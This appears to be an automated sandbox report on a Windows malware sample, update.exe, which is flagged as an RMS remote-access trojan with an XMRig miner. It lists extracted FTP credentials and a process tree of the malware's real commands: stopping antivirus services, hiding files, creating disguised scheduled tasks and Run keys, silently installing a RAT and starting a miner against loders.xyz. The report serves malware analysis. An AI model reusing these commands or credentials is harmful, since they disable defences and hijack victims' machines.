rms | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
328s
max time network
357s
platform
windows10_x64
resource
win10-en-20211104
submitted
12-11-2021 18:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.exe
Size

12.0MB
MD5

c5c8d4f5d9f26bac32d43854af721fb3
SHA1

e4119a28baa102a28ff9b681f6bbb0275c9627c7
SHA256

3e32145dca0843c6d5258129821afaaeb653ddef7982912fe85ad4b326807402
SHA512

09f39bccb210f96788193d597463c75d3213afd21ed93ac8c843f150d7cb8630f941f54cd8737cc88177dadeb479e8181b40a7f5219e40c948ff18d1955b4828

Score

10^/10

rms xmrig aspackv2 discovery evasion miner persistence rat trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
193.32.188.10
Port:
21
Username:
alex
Password:
easypassword

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral32/files/0x000400000001ac05-168.dat	acprotect
behavioral32/files/0x000400000001ac06-169.dat	acprotect

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner

XMRig Miner Payload 2 IoCs

miner

resource	yara_rule
behavioral32/files/0x000400000001ac41-227.dat	xmrig
behavioral32/files/0x000400000001ac41-229.dat	xmrig

ASPack v2.12-2.42 5 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral32/files/0x000400000001ac03-137.dat	aspack_v212_v242
behavioral32/files/0x000400000001ac03-138.dat	aspack_v212_v242
behavioral32/files/0x000400000001ac03-144.dat	aspack_v212_v242
behavioral32/files/0x000400000001ac03-154.dat	aspack_v212_v242
behavioral32/files/0x000400000001ac03-161.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Executes dropped EXE 13 IoCs

pid	Process
1072	wini.exe
496	winit.exe
1368	cheat.exe
680	rutserv.exe
1316	rutserv.exe
2992	taskhost.exe
2020	rutserv.exe
3152	rutserv.exe
1788	taskhostw.exe
2088	R8.exe
2240	taskhost.exe
1052	winlogon.exe
1292	MicrosoftHost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral32/files/0x000400000001ac05-168.dat	upx
behavioral32/files/0x000400000001ac06-169.dat	upx
behavioral32/files/0x000500000001ac01-226.dat	upx
behavioral32/files/0x000500000001ac01-225.dat	upx

Modifies file permissions 1 TTPs 56 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
968	icacls.exe
3284	icacls.exe
3292	icacls.exe
2852	icacls.exe
732	icacls.exe
1436	icacls.exe
968	icacls.exe
1652	icacls.exe
1220	icacls.exe
1268	icacls.exe
2792	icacls.exe
1048	icacls.exe
2044	icacls.exe
1460	icacls.exe
680	icacls.exe
2088	icacls.exe
4092	icacls.exe
3376	icacls.exe
1776	icacls.exe
2208	icacls.exe
1504	icacls.exe
1652	icacls.exe
1400	icacls.exe
1384	icacls.exe
3636	icacls.exe
888	icacls.exe
2824	icacls.exe
3052	icacls.exe
1084	icacls.exe
3492	icacls.exe
3636	icacls.exe
2844	icacls.exe
700	icacls.exe
416	icacls.exe
1096	icacls.exe
2688	icacls.exe
3620	icacls.exe
3852	icacls.exe
2076	icacls.exe
3220	icacls.exe
2916	icacls.exe
584	icacls.exe
1128	icacls.exe
2520	icacls.exe
1236	icacls.exe
1096	icacls.exe
1320	icacls.exe
1072	icacls.exe
4016	icacls.exe
2120	icacls.exe
1944	icacls.exe
3620	icacls.exe
2852	icacls.exe
2904	icacls.exe
2148	icacls.exe
2120	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Modifies WinLogon 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe

autoit_exe 8 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral32/files/0x000400000001ac04-124.dat	autoit_exe
behavioral32/files/0x000400000001ac04-125.dat	autoit_exe
behavioral32/files/0x000500000001ac0d-146.dat	autoit_exe
behavioral32/files/0x000500000001ac0d-145.dat	autoit_exe
behavioral32/files/0x000400000001ac40-216.dat	autoit_exe
behavioral32/files/0x000400000001ac40-215.dat	autoit_exe
behavioral32/files/0x000400000001ac0c-223.dat	autoit_exe
behavioral32/files/0x000400000001ac0c-224.dat	autoit_exe

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3204	schtasks.exe
3592	schtasks.exe
3440	schtasks.exe
1460	schtasks.exe
1652	schtasks.exe
3068	schtasks.exe
788	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
2520	timeout.exe
3564	timeout.exe
612	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1372	ipconfig.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
1920	taskkill.exe
2148	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	R8.exe

NTFS ADS 4 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	update.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhost.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe

Runs .reg file with regedit 2 IoCs

pid	Process
788	regedit.exe
2692	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3196	update.exe
3196	update.exe
3196	update.exe
3196	update.exe
3196	update.exe
3196	update.exe
3196	update.exe
3196	update.exe
3196	update.exe
3196	update.exe
680	rutserv.exe
680	rutserv.exe
680	rutserv.exe
680	rutserv.exe
680	rutserv.exe
680	rutserv.exe
1316	rutserv.exe
1316	rutserv.exe
2020	rutserv.exe
2020	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
3152	rutserv.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe
496	winit.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1788	taskhostw.exe
2240	taskhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
620	Process not Found

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	680	rutserv.exe
Token: SeDebugPrivilege	2020	rutserv.exe
Token: SeTakeOwnershipPrivilege	3152	rutserv.exe
Token: SeTcbPrivilege	3152	rutserv.exe
Token: SeTcbPrivilege	3152	rutserv.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	2148	taskkill.exe
Token: SeLockMemoryPrivilege	1292	MicrosoftHost.exe
Token: SeLockMemoryPrivilege	1292	MicrosoftHost.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
496	winit.exe
680	rutserv.exe
2992	taskhost.exe
1316	rutserv.exe
2020	rutserv.exe
3152	rutserv.exe
1580	WinMail.exe
2144	WinMail.exe
1788	taskhostw.exe
2088	R8.exe
2240	taskhost.exe
1052	winlogon.exe
1292	MicrosoftHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3196 wrote to memory of 1072	3196	update.exe	68
PID 3196 wrote to memory of 1072	3196	update.exe	68
PID 3196 wrote to memory of 1072	3196	update.exe	68
PID 1072 wrote to memory of 2804	1072	wini.exe	69
PID 1072 wrote to memory of 2804	1072	wini.exe	69
PID 1072 wrote to memory of 2804	1072	wini.exe	69
PID 1072 wrote to memory of 496	1072	wini.exe	70
PID 1072 wrote to memory of 496	1072	wini.exe	70
PID 1072 wrote to memory of 496	1072	wini.exe	70
PID 2804 wrote to memory of 872	2804	WScript.exe	72
PID 2804 wrote to memory of 872	2804	WScript.exe	72
PID 2804 wrote to memory of 872	2804	WScript.exe	72
PID 872 wrote to memory of 788	872	cmd.exe	74
PID 872 wrote to memory of 788	872	cmd.exe	74
PID 872 wrote to memory of 788	872	cmd.exe	74
PID 872 wrote to memory of 2692	872	cmd.exe	75
PID 872 wrote to memory of 2692	872	cmd.exe	75
PID 872 wrote to memory of 2692	872	cmd.exe	75
PID 872 wrote to memory of 2520	872	cmd.exe	76
PID 872 wrote to memory of 2520	872	cmd.exe	76
PID 872 wrote to memory of 2520	872	cmd.exe	76
PID 3196 wrote to memory of 1368	3196	update.exe	77
PID 3196 wrote to memory of 1368	3196	update.exe	77
PID 3196 wrote to memory of 1368	3196	update.exe	77
PID 872 wrote to memory of 680	872	cmd.exe	78
PID 872 wrote to memory of 680	872	cmd.exe	78
PID 872 wrote to memory of 680	872	cmd.exe	78
PID 3196 wrote to memory of 3440	3196	update.exe	79
PID 3196 wrote to memory of 3440	3196	update.exe	79
PID 3196 wrote to memory of 3440	3196	update.exe	79
PID 872 wrote to memory of 1316	872	cmd.exe	81
PID 872 wrote to memory of 1316	872	cmd.exe	81
PID 872 wrote to memory of 1316	872	cmd.exe	81
PID 1368 wrote to memory of 2992	1368	cheat.exe	80
PID 1368 wrote to memory of 2992	1368	cheat.exe	80
PID 1368 wrote to memory of 2992	1368	cheat.exe	80
PID 3196 wrote to memory of 1460	3196	update.exe	83
PID 3196 wrote to memory of 1460	3196	update.exe	83
PID 3196 wrote to memory of 1460	3196	update.exe	83
PID 3196 wrote to memory of 1652	3196	update.exe	85
PID 3196 wrote to memory of 1652	3196	update.exe	85
PID 3196 wrote to memory of 1652	3196	update.exe	85
PID 872 wrote to memory of 2020	872	cmd.exe	87
PID 872 wrote to memory of 2020	872	cmd.exe	87
PID 872 wrote to memory of 2020	872	cmd.exe	87
PID 3196 wrote to memory of 3068	3196	update.exe	88
PID 3196 wrote to memory of 3068	3196	update.exe	88
PID 3196 wrote to memory of 3068	3196	update.exe	88
PID 3196 wrote to memory of 2424	3196	update.exe	90
PID 3196 wrote to memory of 2424	3196	update.exe	90
PID 3196 wrote to memory of 2424	3196	update.exe	90
PID 3196 wrote to memory of 2924	3196	update.exe	92
PID 3196 wrote to memory of 2924	3196	update.exe	92
PID 3196 wrote to memory of 2924	3196	update.exe	92
PID 2424 wrote to memory of 1836	2424	cmd.exe	98
PID 2424 wrote to memory of 1836	2424	cmd.exe	98
PID 2424 wrote to memory of 1836	2424	cmd.exe	98
PID 3196 wrote to memory of 1752	3196	update.exe	95
PID 3196 wrote to memory of 1752	3196	update.exe	95
PID 3196 wrote to memory of 1752	3196	update.exe	95
PID 2924 wrote to memory of 2904	2924	cmd.exe	97
PID 2924 wrote to memory of 2904	2924	cmd.exe	97
PID 2924 wrote to memory of 2904	2924	cmd.exe	97
PID 1752 wrote to memory of 3236	1752	cmd.exe	99

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3792	attrib.exe
996	attrib.exe

C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3196
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:872
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:788
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:2692
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:2520
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:680
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1316
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2020
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:3792
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:996
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        
        PID:3256
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1360
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        
        PID:1360
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        
        PID:1732
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:496
  - - C:\Program Files (x86)\Windows Mail\WinMail.exe
      "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:1580
    - - C:\Program Files\Windows Mail\WinMail.exe
        
        "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:3948
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:3564
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - NTFS ADS
    - Suspicious use of SetWindowsHookEx
    PID:2992
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:1788
    - - C:\ProgramData\RealtekHD\taskhost.exe
        
        C:\ProgramData\RealtekHD\taskhost.exe
        5⤵
        Executes dropped EXE
        NTFS ADS
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:2240
      - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        7⤵
        
        PID:868
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        8⤵
        
        PID:1920
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        6⤵
        
        PID:1096
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        7⤵
        Gathers network information
        
        PID:1372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        6⤵
        
        PID:2924
        
        C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        7⤵
        
        PID:3004
      - C:\ProgramData\WindowsTask\MicrosoftHost.exe
        
        C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1292
  - - C:\ProgramData\Microsoft\Intel\R8.exe
      C:\ProgramData\Microsoft\Intel\R8.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:2088
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:848
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1920
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2148
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:612
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
      4⤵
      Drops file in Drivers directory
      PID:1276
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:788
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:3204
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:3592
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:3440
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:1460
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:1652
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:3068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2424
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    PID:1836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    PID:2904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    PID:3236
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:3948
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    PID:2076
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:3796
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    PID:1500
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    PID:2692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:3736
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    PID:3260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    PID:1048
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    PID:2136
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:2280
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    PID:3988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:2176
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    PID:1300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:3684
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
